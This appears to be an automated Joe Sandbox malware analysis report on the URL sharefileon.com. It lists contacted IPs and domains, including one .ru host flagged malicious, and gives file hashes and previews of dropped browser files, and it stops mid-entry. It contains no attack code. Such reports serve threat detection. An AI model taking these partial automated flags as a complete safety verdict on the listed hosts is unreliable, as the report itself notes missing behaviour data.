                                                                                                                                                                                                                      https://local.teams.office.com/sourcemaps/hashed-assets/183153-1c9db25c40ee158a.js.mapchromecache_347.1.dr, chromecache_544.1.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://local.teams.office.com/sourcemaps/hashed-assets/meeting-collaboration-locale-en-us-d9e2dc9f4chromecache_471.1.dr, chromecache_672.1.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          76.223.105.230
                                                                                                                                                                                                                          sharefileon.comUnited States
                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                          104.18.94.41
                                                                                                                                                                                                                          challenges.cloudflare.comUnited States
                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          151.101.130.137
                                                                                                                                                                                                                          code.jquery.comUnited States
                                                                                                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                                                                                                          35.190.80.1
                                                                                                                                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                          104.17.24.14
                                                                                                                                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          104.21.65.72
                                                                                                                                                                                                                          weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ruUnited States
                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          172.67.208.33
                                                                                                                                                                                                                          vexino.mactans.ruUnited States
                                                                                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                          13.248.243.5
                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                          104.18.95.41
                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          13.126.107.86
                                                                                                                                                                                                                          isteam.wsimg.comUnited States
                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                          142.250.181.100
                                                                                                                                                                                                                          www.google.comUnited States
                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                          unknownReserved
                                                                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                                                                          104.17.25.14
                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                          192.168.2.18
                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1576927
                                                                                                                                                                                                                          Start date and time:2024-12-17 18:20:04 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 4m 24s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                          Sample URL:http://sharefileon.com
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:15
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal48.win@22/569@36/14
                                                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.19.206, 64.233.163.84, 142.250.181.142, 172.217.19.10, 142.250.181.67, 92.123.103.59, 92.123.103.83, 92.122.101.18, 92.122.101.19, 172.217.17.35, 172.217.17.46, 23.32.238.168, 23.32.238.209, 52.113.194.132, 13.69.116.109, 23.32.238.26, 23.32.238.51, 23.218.208.109, 4.175.87.197, 23.206.197.17, 52.123.128.14
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): e40258.g.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, a1894.dscb.akamai.net, onedscolprdweu12.westeurope.cloudapp.azure.com, clients2.google.com, redirector.gvt1.com, teams.events.data.microsoft.com, teams-staticscdn.trafficmanager.net, update.googleapis.com, config.teams.microsoft.com, global-wildcard.wsimg.com.sni-only.edgekey.net, statics.teams.cdn.office.net, www.bing.com, clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, fonts.gstatic.com, teams.microsoft.com, config.teams.trafficmanager.net, teams-events-data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, nel.measure.office.net.edgesuite.net, s-0005.s-msedge.net, statics.teams.cdn.office.net-c.edgesuite.net, config-teams.s-0005.s-msedge.net, clients.l.google.com, statics.teams.cdn.office.net-c.edgesuite.net.globalredir.akadns.net, s-0005-teams.config.skype.com, a1813.dscd.akamai.net
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          • VT rate limit hit for: http://sharefileon.com
                                                                                                                                                                                                                          No simulations
                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 16:20:37 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2675
                                                                                                                                                                                                                          Entropy (8bit):3.984059915085053
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:8ZHd9T5rO72HLidAKZdA1rehwiZUklqehqy+3:8ZHVrO7gpy
                                                                                                                                                                                                                          MD5:041FAB38375B101FB2B03B8BF4B45F72
                                                                                                                                                                                                                          SHA1:E5879CFE481C8CD299520236FFBDBFB32C7F0184
                                                                                                                                                                                                                          SHA-256:416722652F2D53D53581F03C79C915E426ABA1B3E05E14F4DC967A4D6DB7D034
                                                                                                                                                                                                                          SHA-512:ABF162DEC206C1789F7A9938EE815555019C8487A507B81AAD9AB44FA8EC49D8B62D5B24A5928E36F7892C5ADF4806A5F4C27D28E141F947FD6EAE55D885493A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....^.J..P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 16:20:37 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2677
                                                                                                                                                                                                                          Entropy (8bit):3.998784540895035
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:8FHd9T5rO72HLidAKZdA1ceh/iZUkAQkqehZy+2:8FHVrO789QQy
                                                                                                                                                                                                                          MD5:94B426DC77618F7C59898EEDAA14EE52
                                                                                                                                                                                                                          SHA1:A886F785072F567F90CFF309887C97F3D7965291
                                                                                                                                                                                                                          SHA-256:C4FCEDF71320B10BA097127F8C3B6340596CD5B2C83E11414D39F0F693D3B63D
                                                                                                                                                                                                                          SHA-512:CB9A4F34976012469D97532A5E8D994BDF2B41426F0BF9BE5401D57D0EEF379D6B0D593578594D92F1F98A1B6A5196F617AB53403AD23BCFD840D790B3B820E2
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....=#>..P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2691
                                                                                                                                                                                                                          Entropy (8bit):4.007095086781564
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:8XRHd9T5rOSHLidAKZdA14Aeh7sFiZUkmgqeh7sny+BX:8hHVrOGn1y
                                                                                                                                                                                                                          MD5:38F04432BA9BE574AFB6777D5857C937
                                                                                                                                                                                                                          SHA1:A996ED92BED4689AF5E923831239E020E9D9139B
                                                                                                                                                                                                                          SHA-256:ABD1F6756B6D8D8357E8BF864CCBA17CB22BCE4FDAE6CD287E4493F588C9542A
                                                                                                                                                                                                                          SHA-512:216FB0962AF8EEE5C11302B5E4E75F7BC4DC1517086A2E400727038EA154FB3AAF21D3CA7CD922B6CCA9B1148FE6A9D4B33808E5963549733F47C473098D090E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 16:20:37 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2679
                                                                                                                                                                                                                          Entropy (8bit):3.9950773840736313
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:8oHd9T5rO72HLidAKZdA1JehDiZUkwqehNy+R:8oHVrO7R/y
                                                                                                                                                                                                                          MD5:5A41F64ECC1792E6F5CD9B0710963322
                                                                                                                                                                                                                          SHA1:2D9F3C836B57B61399B003F300588D7DA7A89B4E
                                                                                                                                                                                                                          SHA-256:DBC8468164ECB922D4724EA8BF50F5878D1AEC4F1C57A3D7BDB632417B85FE0F
                                                                                                                                                                                                                          SHA-512:605F8745DC2FE7C35F445D4C5F025F0A38029001E179EB1696958D490833EA0AB094A4A0A3E6FF1991377F5C649288E1F8493DAD2D822B9AE7093BCFA41A6F63
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.....W8..P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 16:20:37 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2679
                                                                                                                                                                                                                          Entropy (8bit):3.982616467265864
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:8THd9T5rO72HLidAKZdA1XehBiZUk1W1qehDy+C:8THVrO7R9jy
                                                                                                                                                                                                                          MD5:BF65D9B9DB9799A25EBD7C8D00DF2FF2
                                                                                                                                                                                                                          SHA1:AFAAF79DAEB0DCF0B3F04EFBA7A3E2628E3BAC59
                                                                                                                                                                                                                          SHA-256:D18D3E6B3AA4451660F5430B07467E4F61FBD5388D49FDCB06C4020B6133B9F4
                                                                                                                                                                                                                          SHA-512:5B5137DAB0E404E48005A51966B86FD7EA8B21EEFC8F5048CDB425544805308FE8FC15E9A35E44FC949EF4E32AD57FBDC8D295702B8BF29084078451543F5428
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......E..P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 16:20:37 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                                                                          Entropy (8bit):3.9941867373660385
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:8/Hd9T5rO72HLidAKZdA1duT+ehOuTbbiZUk5OjqehOuTb1y+yT+:8/HVrO7TT/TbxWOvTb1y7T
                                                                                                                                                                                                                          MD5:1881BE0B3F60B1062417D61A1B7963E3
                                                                                                                                                                                                                          SHA1:F8246FCBF21773C31ED546A05BE49F44C091A12D
                                                                                                                                                                                                                          SHA-256:D70A84AAF3D41EF0C16AF449DACE86CD1D87E32DC124DA5AD5473EC725489603
                                                                                                                                                                                                                          SHA-512:7B15E17D83DB1758B1F0308281F9A5B2C1E2D9D624B4117756B422CC963B72D3FB112ED2564F400F89C0B7DF9A3E7556594E7CAA88EFF25A6E9DB632F0F99D3F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.........P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I.Y......B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V.Y......M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V.Y.............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):48316
                                                                                                                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (44430)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):44538
                                                                                                                                                                                                                          Entropy (8bit):5.447081494250054
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:P42u5mtBtjEehBi7fLl65p6IGnmNhR7QnByQOzwjWjXVx3KTvmU20DnzxH2R4kJI:P+At4mi/ySnCZQup0hy5V8WdCtNJwwIC
                                                                                                                                                                                                                          MD5:276C68721ADA14C261592309DE5E89FF
                                                                                                                                                                                                                          SHA1:D8937600043FE114484C25C74F55FB6F011BE4EB
                                                                                                                                                                                                                          SHA-256:AB49D588961EB600B87818670049237EB512024C57D9459724E1D089DB07AFAE
                                                                                                                                                                                                                          SHA-512:9B663944E60E27D5998CCD41175FCB8AB7B565FCEF2FE13B247C8BB749EEA3CA351B7948A7CFF0C9072CE55D28581B4FD843019B502040778D4222108F52B397
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[950449],{466563:(e,t,a)=>{a.d(t,{Xp:()=>i,AX:()=>o,q0:()=>r,WD:()=>s});var n=a(942016);function i(e,t){return{entity:{type:n.ck.chats,action:n.SY.create,id:o(e)},command:t}}function o(e){return JSON.stringify(e&&e.length>0?e.sort():[])}function r(e,t,a,n){let i={};if(!e)return i;if(e.type===t&&e.action===a){const t=e.options;if(t&&"string"==typeof t)try{i=JSON.parse(t)}catch{n.warn(`Entity options are in unexpected format. Expected a valid stringified JSON object but instead received: ${String(t)}.`)}}else n.warn(`Entity options are (incorrectly) being asked for type and action that do not pertain to the entity. ${String(e.type)} != ${String(t)} or ${String(e.action)} != ${String(a)}`);return i}const s=e=>`${e.substring(0,32)}00000000${e.substring(40)}`},403376:(e,t,a)=>{a.d(t,{r:()=>i});var n=a(362328);const i={kind:"Document",get definitions(){const e=(0,n.G)("query message
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):542252
                                                                                                                                                                                                                          Entropy (8bit):5.737556808915014
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:YrvH0N4mj8aOxd2TEvqMZ1M9Cjd2OfZitd2TEi:OUN4muccqMZ1M9Cjdlfktcv
                                                                                                                                                                                                                          MD5:BEB098050EFB7158FB14C734183EB402
                                                                                                                                                                                                                          SHA1:B18B6CA2ABBDEACB94801961AD3318FA17E827B7
                                                                                                                                                                                                                          SHA-256:F3E83CF57A793389E1AA535D2664D838C7BE4ACD8D6B836BA607A975354817AD
                                                                                                                                                                                                                          SHA-512:5CE2909ED577E8E8554F963E3FFFD4B061DB852D1954041D2A6672559EE8EA210B136E90E6F27C93D4ABD681FE92490BD5D089DBECDF639962E308F517686237
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/13290-6ce7944222d53848.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[13290],{78727:(e,t,n)=>{e.exports=n.p+"133bf0a0b104ec3dfc5b9ab207e54873.svg"},960935:(e,t,n)=>{e.exports=n.p+"c52bdfa460d7b878541ff0d9833e3c7b.svg"},870586:(e,t,n)=>{e.exports=n.p+"93bf1cc8b8b8092aab2c385d85d22c8d.svg"},834818:(e,t,n)=>{e.exports=n.p+"79f07ba26ed583574678b31546848509.svg"},603313:(e,t,n)=>{e.exports=n.p+"33c8b3e3c8d71273ed9abc4d1bec9bcc.svg"},567322:(e,t,n)=>{e.exports=n.p+"5d07fdf28991f39897b8734021141a6f.svg"},604322:(e,t,n)=>{e.exports=n.p+"0d10d16cedc7b8262d0863ae455bb683.svg"},791542:(e,t,n)=>{e.exports=n.p+"774888c01ebff051c2cad178c17079b3.svg"},118356:(e,t,n)=>{e.exports=n.p+"36fd037c0c6525c9044c5c8ef757c740.svg"},952388:(e,t,n)=>{e.exports=n.p+"5066e146579e847ea9f2d818aab586bb.svg"},152248:(e,t,n)=>{e.exports=n.p+"7aa4c2455abe8a0c8cfa1e8e4b93494c.svg"},444257:(e,t,n)=>{e.exports=n.p+"e0420569cdac40ed7e659a1dae697de8.svg"},698037:(e,t,n)=>{"use strict";n.d(t,{hT:()
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (19951)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):20058
                                                                                                                                                                                                                          Entropy (8bit):5.301484485075663
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:UOmMRB7DsuJmOv7+ijeoTfJoINLEqF+5BGk:fbsVqtjPThorVJ
                                                                                                                                                                                                                          MD5:34407BE2AFA1792CDB44C58E48ABFB23
